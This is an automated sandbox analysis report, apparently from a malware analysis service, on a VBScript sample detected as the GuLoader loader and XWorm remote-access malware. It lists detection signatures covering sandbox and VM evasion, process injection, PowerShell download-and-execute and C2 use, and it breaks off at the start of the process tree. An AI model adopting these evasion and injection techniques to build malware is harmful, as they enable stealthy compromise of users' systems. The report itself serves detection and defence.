Windows
Analysis Report
file.vbs
Overview
General Information
Detection
GuLoader, XWorm
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected XWorm
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 7676 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\file.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
powershell.exe (PID: 7772 cmdline: